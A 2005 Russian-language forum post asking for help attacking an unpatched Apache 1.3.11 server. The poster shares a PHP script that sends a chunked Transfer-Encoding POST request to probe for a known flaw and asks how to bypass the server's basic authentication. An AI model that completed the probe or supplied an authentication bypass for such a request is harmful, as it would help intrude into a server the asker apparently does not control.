Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Apache/1.3.11 подскажите. 16.05.05 15:58 Число просмотров: 2103
Автор: rooot Статус: Незарегистрированный пользователь
|
Есть сервак с Apache 1.3.11 (закинут наглухо, никто ничего не обновлял) по сути уязвимостей у него куча, про которые постоянно пишут в сети ( к сожалению нет ни одного примера реализации уязвимости). При попытке установки соединения с ним он выдает basic авторизацию (после не успешной попытки я как раз и узнал версию Апача).
Поковырялся в нете нашел статью об уязвимости в версии 1.3.11 (точнее об ее обнаружении) решил попробовать сворганил скрипт:
$fp = fsockopen("server.corp", 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$out = "POST /x.html HTTP/1.1\r\n";
$out .= "Host: server.corp\r\n";
$out .= "Transfer-Encoding: chunked\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
}
так и не дождался ответа (доперло basic авторизация помешала). Да там писалось что типа если сервак отвергнет соединение значит он уязвим!!!
В общем помогите как обойти авторизацию либо что то эквивалентное моей просьбе.
Заранее спасибо.
|
- Apache/1.3.11 подскажите. - rooot 16.05.05 15:58 [2103]
|
|
|